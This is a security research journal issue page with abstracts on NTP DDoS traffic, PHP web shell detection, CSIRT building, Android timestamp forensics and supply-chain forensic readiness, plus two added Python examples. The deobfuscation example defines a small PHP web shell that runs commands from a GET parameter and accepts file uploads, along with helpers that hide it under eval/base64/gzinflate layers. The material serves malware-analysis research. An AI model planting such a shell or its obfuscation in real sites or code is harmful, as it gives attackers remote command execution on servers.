ARJ Volume 107 No 2
Download the issue (complete journal) (~7.88 MB).
Download the cover (Editorial Board Information) (~1.38 MB)
Table of Contents (1.55 MB)
Jump to Paper:
1. Characterization and Analysis of NTP Amplifier Traffic
2. Detecting Derivative Malware Samples using Deobfuscation-Assisted Similarity Analysis
3. A Management Model for Building a Computer Security Incident Response Capability
4. A Reference Architecture for Android Applications to Support the Detection of Manipulated Evidence
5. Using a Standard Approach to the Design of next Generation E-Supply Chain Digital Forensic Readiness Systems
Characterization and Analysis of NTP Amplifier Traffic
by L. Rudman and B. Irwin
Abstract: Network Time Protocol based DDoS attacks saw a lot of popularity throughout 2014. This paper shows the characterization and analysis of two large datasets containing packets from NTP based DDoS attacks captured in South Africa. Using a series of Python based tools, the dataset is analysed according to specific parts of the packet headers. These include the source IP address and Time-to-Live (TTL) values. The analysis found the top source addresses and looked at the TTL values observed for each address. These TTL values can be used to calculate the probable operating system or DDoS attack tool used by an attacker. We found that each TTL value seen for an address can indicate the number of hosts attacking the address or indicate minor routing changes. The Time-to-Live values are then analysed as a whole to find the total number used throughout each attack. The most frequent TTL values are then found and show that the majority of them indicate the attackers are using an initial TTL of 255. This value can indicate the use of a certain DDoS tool that creates packets with that exact initial TTL. The TTL values are then put into groups that can show the number of IP addresses a group of hosts are targeting. The paper discusses our work with two brief case studies correlating observed data to real-world attacks, and the observable impact thereof.
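The TTL inference the abstract describes (observed TTL to probable initial TTL, hop distance, and per-source TTL spread) can be reproduced in a few lines. The block below is an added example written for this page; it is not one of the authors' tools and the packet records in it are constructed, not taken from the South African captures. It assumes the usual initial-TTL set of 32, 64, 128 and 255 and that no path is long enough for an observed value to fall below the next-lower boundary; the function names (probable_initial_ttl, hop_distance, analyse, source_summary) are this example's own.

```python
"""TTL-based inference over a constructed set of NTP amplifier packets.

Added example: the records below are made up for illustration and the helper
names are this example's own, not the authors' tools.
"""
from collections import Counter, defaultdict

# Constructed sample of (source address, observed IP TTL) pairs, standing in
# for the per-packet header fields a capture parser would yield. Not real data.
SAMPLE = [
    ("198.51.100.7", 243), ("198.51.100.7", 243), ("198.51.100.7", 242),
    ("203.0.113.9", 50), ("203.0.113.9", 50),
    ("192.0.2.33", 116), ("192.0.2.33", 115), ("192.0.2.33", 116),
    ("198.51.100.7", 243), ("203.0.113.9", 49),
]

# Initial TTLs used by common stacks and tools. Assumption: the observed TTL
# has not been decremented past the next-lower boundary (fewer than 32 hops).
INITIAL_TTLS = (32, 64, 128, 255)


def probable_initial_ttl(ttl):
    """Smallest common initial TTL that is >= the observed value."""
    for init in INITIAL_TTLS:
        if ttl <= init:
            return init
    raise ValueError("TTL out of range: %r" % ttl)


def hop_distance(ttl):
    """Estimated number of routers between the sender and the capture point."""
    return probable_initial_ttl(ttl) - ttl


def analyse(records):
    """Return (per-source TTL counts, overall TTL counts, inferred initial TTL counts)."""
    per_source = defaultdict(Counter)
    for src, ttl in records:
        per_source[src][ttl] += 1
    overall = Counter(ttl for _, ttl in records)
    initial = Counter(probable_initial_ttl(ttl) for _, ttl in records)
    return per_source, overall, initial


def source_summary(records):
    """Per source: packet count, distinct TTLs seen and the hop estimate for each.

    More than one TTL for a source points at several senders behind that
    address or at a routing change, which is the reading the abstract gives.
    """
    per_source, _, _ = analyse(records)
    summary = {}
    for src, ttls in per_source.items():
        summary[src] = {
            "packets": sum(ttls.values()),
            "ttls": sorted(ttls),
            "initial_ttl": probable_initial_ttl(max(ttls)),
            "hops": sorted({hop_distance(t) for t in ttls}),
        }
    return summary


if __name__ == "__main__":
    per_source, overall, initial = analyse(SAMPLE)
    print("most frequent TTLs:", overall.most_common(3))
    print("inferred initial TTLs:", initial.most_common())
    ranked = sorted(source_summary(SAMPLE).items(), key=lambda kv: -kv[1]["packets"])
    for src, info in ranked:
        print(src, info)
```

On the constructed sample the most frequent inferred initial TTL is 255, the same signal the abstract reports for the real captures; the check is only as good as the boundary assumption, so a source whose observed TTLs straddle two boundaries (for example 64 and 65) should be flagged rather than silently assigned.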
DETECTING DERIVATIVE MALWARE SAMPLES USING DEOBFUSCATION-ASSISTED SIMILARITY ANALYSIS
by P. Wrench and B. Irwin
Abstract: The abundance of PHP-based Remote Access Trojans (or web shells) found in the wild has led malware researchers to develop systems capable of tracking and analysing these shells. In the past, such shells were ably classified using signature matching, a process that is currently unable to cope with the sheer volume and variety of web-based malware in circulation. Although a large percentage of newly-created web shell software incorporates portions of code derived from seminal shells such as c99 and r57, they are able to disguise this by making extensive use of obfuscation techniques intended to frustrate any attempts to dissect or reverse engineer the code. This paper presents an approach to shell classification and analysis (based on similarity to a body of known malware) in an attempt to create a comprehensive taxonomy of PHP-based web shells. Several different measures of similarity were used in conjunction with clustering algorithms and visualisation techniques in order to achieve this. Furthermore, an auxiliary component capable of syntactically deobfuscating PHP code is described. This was employed to reverse idiomatic obfuscation constructs used by software authors. It was found that this deobfuscation dramatically increased the observed levels of similarity by exposing additional code for analysis.
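The effect the abstract reports, that peeling idiomatic wrapper layers exposes code and raises measured similarity, can be shown end to end. The block below is an added example for this page, not the authors' deobfuscator or taxonomy code: the "known shell" is a constructed fragment (not c99 or r57 source), the wrapper layers are generated in-block so they are known to be correct, and Jaccard similarity over token 3-grams is one similarity measure chosen here, not necessarily one the paper used. The decoder table covers the eval(base64_decode(...)), gzinflate, gzuncompress and str_rot13 idioms only.

```python
"""Syntactic deobfuscation of eval() wrapper layers, then n-gram similarity.

Added example: the shell source is a constructed stand-in, the wrapper and
decoder helpers are this example's own, and Jaccard over token 3-grams is
one similarity measure among several the paper could mean.
"""
import base64
import codecs
import re
import zlib

# Constructed "known" shell fragment, not c99/r57 code.
KNOWN_SHELL = """<?php
if (isset($_GET['cmd'])) { $out = shell_exec($_GET['cmd']); echo "<pre>$out</pre>"; }
if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); }
?>"""


def raw_deflate(data):
    """Raw DEFLATE stream, which is what PHP's gzinflate() expects."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    return co.compress(data) + co.flush()


def wrap_base64(code):
    """Wrap PHP source in the eval(base64_decode('...')) idiom."""
    return "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(code.encode()).decode()


def wrap_gzinflate(code):
    """Wrap PHP source in the eval(gzinflate(base64_decode('...'))) idiom."""
    blob = base64.b64encode(raw_deflate(code.encode())).decode()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % blob


# Decoders for the wrapper functions handled here, applied innermost first.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}

# Matches  eval( f1( f2( ... 'literal' ) ... ) );  with each f drawn from DECODERS.
LAYER = re.compile(r"eval\(\s*((?:(?:%s)\(\s*)+)'([^']*)'\s*\)+\s*;" % "|".join(DECODERS))


def deobfuscate(code, max_layers=16):
    """Peel eval() wrapper layers until none matches; returns the exposed code."""
    for _ in range(max_layers):
        m = LAYER.search(code)
        if not m:
            break
        funcs = re.findall(r"(\w+)\(", m.group(1))
        data = m.group(2).encode()
        for name in reversed(funcs):
            data = DECODERS[name](data)
        inner = data.decode("utf-8", "replace")
        # Drop the payload's own PHP tags so it splices into the enclosing block.
        inner = re.sub(r"^\s*<\?php\s*", "", inner)
        inner = re.sub(r"\s*\?>\s*$", "", inner)
        code = code[:m.start()] + inner + code[m.end():]
    return code


def tokens(code):
    """Crude PHP tokeniser: variables, words and single punctuation characters."""
    return re.findall(r"\$\w+|\w+|[^\s\w]", code)


def ngrams(seq, n=3):
    return {tuple(seq[i:i + n]) for i in range(len(seq) - n + 1)}


def similarity(a, b, n=3):
    """Jaccard similarity of token n-gram sets; 1.0 means identical token streams."""
    ga, gb = ngrams(tokens(a), n), ngrams(tokens(b), n)
    if not ga and not gb:
        return 1.0
    return len(ga & gb) / len(ga | gb)


def compare(known, sample):
    """Similarity to the known shell before and after peeling wrapper layers."""
    return similarity(known, sample), similarity(known, deobfuscate(sample))


if __name__ == "__main__":
    derived = wrap_gzinflate(wrap_base64(KNOWN_SHELL))  # two nested layers
    before, after = compare(KNOWN_SHELL, derived)
    print("similarity before: %.2f  after: %.2f" % (before, after))
```

The decoders run on the literal only and never execute PHP, which is the point of a syntactic rather than dynamic approach; layers built with string concatenation, variable-function calls or a quote inside the literal will not match the pattern and are left as they are, so an analysis pipeline should report how many layers were peeled rather than assume the output is fully exposed.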
A MANAGEMENT MODEL FOR BUILDING A COMPUTER SECURITY INCIDENT RESPONSE CAPABILITY
by Roderick D. Mooi and Reinhardt A. Botha
Abstract: Although there are numerous guides available for establishing a computer security incident response capability, there appears to be no underlying management model that brings them all together. This paper aims to address the problem by developing a management model for establishing a Computer Security Incident Response Team (CSIRT). A design science-based approach has been selected for the overall project. However, the current paper reports on the first three activities in design science research: identifying the problem, listing solution objectives, and designing and developing a model. A comprehensive literature review serves two purposes: to confirm the problem and to provide a structured way of revealing the requirement areas. Following the uncovering of the requirement areas, CSIRT business requirements and services are introduced, before exploring the relationships between the areas using argumentation. This culminates in the development of the management model in two parts: a strategic view and a tactical view. The strategic view comprises the business requirements and "higher" level decisions (the environment, constituency and funding considerations) that need to be made when establishing a CSIRT. The tactical view follows by presenting the "how" considerations. Together, these two views provide a holistic model for establishing a CSIRT by parties interested in doing so.
A REFERENCE ARCHITECTURE FOR ANDROID APPLICATIONS TO SUPPORT THE DETECTION OF MANIPULATED EVIDENCE
by H. Pieterse, M.S. Olivier and R.P. van Heerden
Abstract: Traces found on Android smartphones form a significant part of digital investigations. A key component of these traces is the date and time, often formed as timestamps. These timestamps allow the examiner to relate the traces found on Android smartphones to some real event that took place. This paper performs exploratory experiments that involve the manipulation of timestamps found in SQLite databases on Android smartphones. Based on observations, specific heuristics are identified that may allow for the identification of manipulated timestamps. To overcome the limitations of these heuristics, a new reference architecture for Android applications is also introduced. The reference architecture provides examiners with a better understanding of Android applications as well as the associated digital evidence. The results presented in the paper show that the suggested techniques to establish the authenticity and accuracy of digital evidence are feasible.
Using a standard approach to the design of next generation e-Supply Chain Digital Forensic Readiness systems
by D.J.E. Masvosvere and H.S. Venter
Abstract: The internet has had a major impact on how information is shared within supply chains, and in commerce in general. This has resulted in the establishment of information systems such as e-supply chains (eSCs), amongst others, which integrate the internet and other information and communications technology (ICT) with traditional business processes for the swift transmission of information between trading partners. Many organisations have reaped the benefits that come from adopting the eSC model, but have also faced the challenges with which it comes. One such major challenge is information security. With the current state of cybercrime, system developers are challenged with the task of developing cutting edge digital forensic readiness (DFR) systems that can keep up with current technological advancements, such as eSCs. Hence, the problem addressed in this paper is the lack of a well-formulated DFR approach that can assist system developers in the development of e-supply chain digital forensic readiness systems. The main objective of such a system is that it must be able to provide law enforcement/digital forensic investigators (DFI) with forensically sound and readily available potential digital evidence that can expedite and support digital forensics incident response processes. This approach, if implemented, can also prepare trading partners for security incidents that might take place, if not prevent them from occurring. Therefore, the work presented in this paper is aimed at providing a procedural approach that is based on digital forensics principles. This paper discusses the limitations of current system monitoring tools in relation to the kind of specialised DFR systems that are needed in the eSC environment and proposes an eSC DFR process model and architectural design model that can lead to the development of next-generation eSC DFR systems.
It is the view of the authors that the conclusions drawn from this paper can spearhead the development of cutting-edge next-generation digital forensic readiness systems, and bring attention to some of the shortcomings of current system monitoring tools.